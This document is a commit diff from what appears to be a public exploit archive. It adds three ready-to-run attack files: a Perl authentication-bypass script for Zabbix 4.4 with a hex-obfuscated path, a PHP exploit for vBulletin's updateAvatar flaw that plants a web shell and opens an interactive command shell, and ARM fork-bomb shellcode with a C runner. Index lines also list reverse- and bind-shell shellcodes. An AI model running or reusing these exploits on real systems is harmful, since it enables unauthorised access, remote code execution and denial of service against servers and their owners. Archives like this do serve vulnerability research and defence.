DB: 2019-10-09

3 changes to exploits/shellcodes vBulletin 5.0 < 5.5.4 - Unauthenticated Remote Code Execution vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution Zabbix 4.4 - Authentication Bypass vBulletin 5.0 < 5.5.4 - 'updateAvatar' Authenticated Remote Code Execution Linux/ARM - Fork Bomb Shellcode (20 bytes)
2019-10-09 05:01:45 +00:00 · 2019-10-09 05:01:45 +00:00 · 54bc76dcfd
commit 54bc76dcfd
parent bfcf0daec9
5 changed files with 327 additions and 1 deletions
--- a/exploits/php/webapps/47474.pl
+++ b/exploits/php/webapps/47474.pl
@ -0,0 +1,123 @@
 # Exploit Title: Zabbix 4.4 - Authentication Bypass
 # Date: 2019-10-06
 # Exploit Author: Todor Donev
 # Software Link: https://www.zabbix.com/download
 # Version: Zabbix 4.4
 # Tested on: Linux Apache/2 PHP/7.2
 #
 #  Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit
 #
 #  Copyright 2019 (c) Todor Donev 
 #
 #  Disclaimer:
 #  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
 #  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
 #  caused by direct or indirect use of the  information or functionality provided by these programs. 
 #  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
 #  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
 #  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
 #  responsibility.
 #   
 #  Use them at your own risk!  
 #  
 #  (Dont do anything without permissions)
 #
 #	#  [ Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit
 #	#  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
 #	#  [ Initializing the browser
 #	#  [ >>> Referer => 
 #	#  [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1
 #	#  [ >>> Content-Type => application/x-www-form-urlencoded
 #	#  [ <<< Cache-Control => no-store, no-cache, must-revalidate
 #	#  [ <<< Connection => close
 #	#  [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT
 #	#  [ <<< Pragma => no-cache
 #	#  [ <<< Server => nginx
 #	#  [ <<< Vary => Accept-Encoding
 #	#  [ <<< Content-Type => text/html; charset=UTF-8
 #	#  [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT
 #	#  [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT
 #	#  [ <<< Client-Peer => 
 #	#  [ <<< Client-Response-Num => 1
 #	#  [ <<< Client-SSL-Cert-Issuer => 
 #	#  [ <<< Client-SSL-Cert-Subject => 
 #	#  [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256
 #	#  [ <<< Client-SSL-Socket-Class => IO::Socket::SSL
 #	#  [ <<< Client-SSL-Warning => Peer certificate not verified
 #	#  [ <<< Client-Transfer-Encoding => chunked
 #	#  [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css"
 #	#  [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly
 #	#  [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload
 #	#  [ <<< Title => TARGET: Dashboard
 #	#  [ <<< X-Content-Type-Options => nosniff
 #	#  [ <<< X-Frame-Options => SAMEORIGIN
 #	#  [ <<< X-Meta-Author => Zabbix SIA
 #	#  [ <<< X-Meta-Charset => utf-8
 #	#  [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d
 #	#  [ <<< X-Meta-Msapplication-Config => none
 #	#  [ <<< X-Meta-Msapplication-TileColor => #d40000
 #	#  [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png
 #	#  [ <<< X-Meta-Viewport => width=device-width, initial-scale=1
 #	#  [ <<< X-UA-Compatible => IE=Edge
 #	#  [ <<< X-XSS-Protection => 1; mode=block
 #	#  [
 #	#  [ The target is vulnerable. Try to open these links:
 #	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view
 #	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1
 #	#  [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1
 #	#  [ https://TARGET/zabbix/overview.php?ddreset=1
 #	#  [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1
 #	#  [ https://TARGET/zabbix/latest.php?ddreset=1
 #	#  [ https://TARGET/zabbix/charts.php?ddreset=1
 #	#  [ https://TARGET/zabbix/screens.php?ddreset=1
 #	#  [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1
 #	#  [ https://TARGET/zabbix/srv_status.php?ddreset=1
 #	#  [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1
 #	#  [ https://TARGET/zabbix/hostinventories.php?ddreset=1
 #	#  [ https://TARGET/zabbix/report2.php?ddreset=1
 #	#  [ https://TARGET/zabbix/toptriggers.php?ddreset=1
 #	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.list
 #	#  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
 # 
 #!/usr/bin/perl -w
 use strict;
 use HTTP::Request;
 use LWP::UserAgent;
 use WWW::UserAgent::Random;
 use HTML::TreeBuilder;
 my $host = shift || ''; # Full path url to the store
 $host =~ s|/$||;
 print "\033[2J";    #clear the screen
 print "\033[0;0H"; #jump to 0,0
 print "[ Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit\n";
 print "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
 print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
 print "[ Initializing the browser\n";
 my $user_agent = rand_ua("browsers");
 my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
   $browser->timeout(30);
   $browser->agent($user_agent);
 my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31";
 my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);                      
 my $response = $browser->request($request);
 print "[ >>> $_ => ", $request->header($_), "\n" for  $request->header_field_names;
 print "[ <<< $_ => ", $response->header($_), "\n" for  $response->header_field_names;
 print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401');
 print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403');
 if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){
    print "[\n[ The target is vulnerable. Try to open these links:\n";
    my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
    my @files = $tree->look_down(_tag => 'a');
    for my $line (@files){
        next if ($line->attr('href') =~ m/javascript/);
        next if ($line->attr('href') =~ m/\#/);
        next if ($line->attr('href') =~ m/http/);
        print "[ ", $host."/zabbix/".$line->attr('href'), "\n";
    }
 } else { 
        print "[ Exploit failed! The target isn't vulnerable\n";
        exit;
 }
--- a/exploits/php/webapps/47475.php
+++ b/exploits/php/webapps/47475.php
@ -0,0 +1,121 @@
 <?php
 /*
    ---------------------------------------------------------------------
    vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability
    ---------------------------------------------------------------------
    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://www.vbulletin.com/
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    [-] Vulnerability Description:
    User input passed through the "data[extension]" and "data[filedata]" parameters to
    the "ajax/api/user/updateAvatar" endpoint is not properly validated before being used
    to update users' avatars. This can be exploited to inject and execute arbitrary PHP code.
    Successful exploitation of this vulnerability requires the "Save Avatars as Files" option
    to be enabled (disabled by default).
    [-] Disclosure timeline:
    [30/09/2019] - Vendor notified
    [03/10/2019] - Patch released: https://bit.ly/2OptAzI
    [04/10/2019] - CVE number assigned (CVE-2019-17132)
    [07/10/2019] - Public disclosure
 */
 set_time_limit(0);
 error_reporting(E_ERROR);
 if (!extension_loaded("curl")) die("[-] cURL extension required!\n");
 print "+-------------------------------------------------------------------------+";
 print "\n| vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Exploit by EgiX |";
 print "\n+-------------------------------------------------------------------------+\n";
 if ($argc != 4)
 {
 	print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
 	print "\nExample....: php $argv[0] http://localhost/vb/ user passwd";
 	print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n";
 	die();
 }
 list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($ch, CURLOPT_HEADER, true);
 print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n";
 curl_setopt($ch, CURLOPT_URL, $url);
 if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n");
 curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");
 curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
 curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");
 if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n");
 print "[-] Logged-in! Retrieving security token...\n";
 curl_setopt($ch, CURLOPT_URL, $url);
 curl_setopt($ch, CURLOPT_POST, false);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
 if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n");
 print "[-] Uploading new avatar...\n";
 $params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]];
 curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture");
 curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
 curl_setopt($ch, CURLOPT_HEADER, false);
 if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n");
 if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n");
 print "[-] Updating avatar with PHP shell...\n";
 $php_code = '<?php print("____"); passthru(base64_decode($_SERVER["HTTP_CMD"])); ?>';
 $params = ["routestring" => "ajax/api/user/updateAvatar",
           "userid" => 0,
           "avatarid" => 0,
           "data[extension]" => "php",
           "data[filedata]" => $php_code,
           "securitytoken" => $token[1]];
 curl_setopt($ch, CURLOPT_URL, $url);
 curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
 if (curl_exec($ch) !== "true") die("[-] Update failed!\n");
 print "[-] Launching shell...\n";
 preg_match('/(\d+)\.jpeg/', $path, $m);
 $path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path);
 curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}");
 curl_setopt($ch, CURLOPT_POST, false);
 while(1)
 {
    print "\nvb-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
    preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
 }
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -41794,7 +41794,7 @@ id,file,description,date,author,type,platform,port
 47440,exploits/python/webapps/47440.txt,"thesystem 1.0 - Cross-Site Scripting",2019-09-30,"Anıl Baran Yelken",webapps,python,
 47441,exploits/python/webapps/47441.txt,"TheSystem 1.0 - Command Injection",2019-09-30,"Sadik Cetin",webapps,python,
 47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' Disable Functions Bypass",2019-09-28,mm0r1,webapps,multiple,
-47447,exploits/php/webapps/47447.py,"vBulletin 5.0 < 5.5.4 - Unauthenticated Remote Code Execution",2019-09-23,anonymous,webapps,php,
+47447,exploits/php/webapps/47447.py,"vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution",2019-09-23,anonymous,webapps,php,
 47448,exploits/multiple/webapps/47448.py,"DotNetNuke < 9.4.0 - Cross-Site Scripting",2019-10-01,MaYaSeVeN,webapps,multiple,80
 47455,exploits/php/webapps/47455.php,"Detrix EDMS 1.2.3.1505 - SQL Injection",2019-10-02,"Burov Konstantin",webapps,php,80
 47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux,
@ -41805,3 +41805,5 @@ id,file,description,date,author,type,platform,port
 47467,exploits/php/webapps/47467.txt,"Zabbix 4.2 - Authentication Bypass",2019-10-07,"Milad Khoshdel",webapps,php,
 47469,exploits/php/webapps/47469.txt,"Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting",2019-10-07,Creatigon,webapps,php,
 47470,exploits/java/webapps/47470.txt,"IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload",2019-10-07,"Jakub Palaczynski",webapps,java,
 47474,exploits/php/webapps/47474.pl,"Zabbix 4.4 - Authentication Bypass",2019-10-08,"Todor Donev",webapps,php,
 47475,exploits/php/webapps/47475.php,"vBulletin 5.0 < 5.5.4 - 'updateAvatar' Authenticated Remote Code Execution",2019-10-07,EgiX,webapps,php,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -1003,3 +1003,4 @@ id,file,description,date,author,type,platform
 47352,shellcodes/linux_x86/47352.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)",2019-09-05,guly,shellcode,linux_x86
 47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86
 47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86
 47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm
--- a/shellcodes/arm/47473.c
+++ b/shellcodes/arm/47473.c
@ -0,0 +1,79 @@
 # Title:  Linux/ARM - Fork Bomb Shellcode (20 bytes)
 # Date:   2019-10-07
 # Category: Shellcode
 # Tested: armv7l (32-bit)(Raspberry Pi 2 Model B) (OS: Raspbian Buster Lite)
 # Author: CJHackerz
 # Description: This shellcode creates new processes in infinite loop to exhaust CPU resources leading to crash
 /*
 ## Compilation instruction
 pi@raspberrypi:~ cat forkbomb_ARM32.s
 .text
 .global _start
 _start:
 	.code 32
 	ADD R3, PC, #1	//Switching to Thumb mode
 	BX R3
 	.code 16
 	_loop:
 		EOR R7, R7
 		MOV R7, #2	//Syscall to fork()
 		SVC #1
 		MOV R8, R8 //NOP
 		BL _loop
 pi@raspberrypi:~ cat Makefile
 forkbomb_ARM32:  forkbomb_ARM32.o
 	ld forkbomb_ARM32.o -o forkbomb_ARM32
 forkbomb_ARM32.o:  forkbomb_ARM32.s
 	as forkbomb_ARM32.s -o forkbomb_ARM32.o
 clean:
 	rm *.o forkbomb_ARM32
 pi@raspberrypi:~ make
 pi@raspberrypi:~ objcopy -O binary forkbomb_ARM32 forkbomb_ARM32.bin
 pi@raspberrypi:~ hexdump -v -e '"\\""x" 1/1 "%02x" ""' forkbomb_ARM32.bin && echo
 \x01\x30\x8f\xe2\x13\xff\x2f\xe1\x7f\x40\x02\x27\x01\xdf\xc0\x46\xff\xf7\xfa\xff
 ## Testing compiled shellcode
 pi@raspberrypi:~ file forkbomb_ARM32
 forkbomb_ARM32: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, not stripped
 pi@raspberrypi:~ strace ./forkbomb_ARM32
 execve("./forkbomb_ARM32", ["./forkbomb_ARM32"], 0x7eab36e0 ) = 0
 fork()                                  = 21975
 fork()                                  = 22000
 fork()                                  = 22016
 fork()                                  = 22044
 fork()                                  = 22087
 fork()                                  = 22125
 fork()                                  = 22162
 fork()                                  = 22199
 fork()                                  = 22242
 fork()                                  = 22287
 fork()                                  = 22326
 fork()                                  = 23343
 fork()                                  = 23501
 fork()                                  = 23539
 fork()                                  = 23606
 fork()                                  = 26670
 ^Cstrace: Process 21974 detached
 ## Steps to compile given shellcode C program file
 pi@raspberrypi:~ gcc -fno-stack-protector -z execstack forkbomb_ARM32.c -o forkbomb_ARM32-test
 */
 #include<stdio.h>
 #include<string.h>
 unsigned char shellcode[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x7f\x40\x02\x27\x01\xdf\xc0\x46\xff\xf7\xfa\xff";
 main(){
 	printf("Shellcode Length:  %d\n", (int)strlen(shellcode));
 	int (*ret)() = (int(*)())shellcode;
 	ret();
 }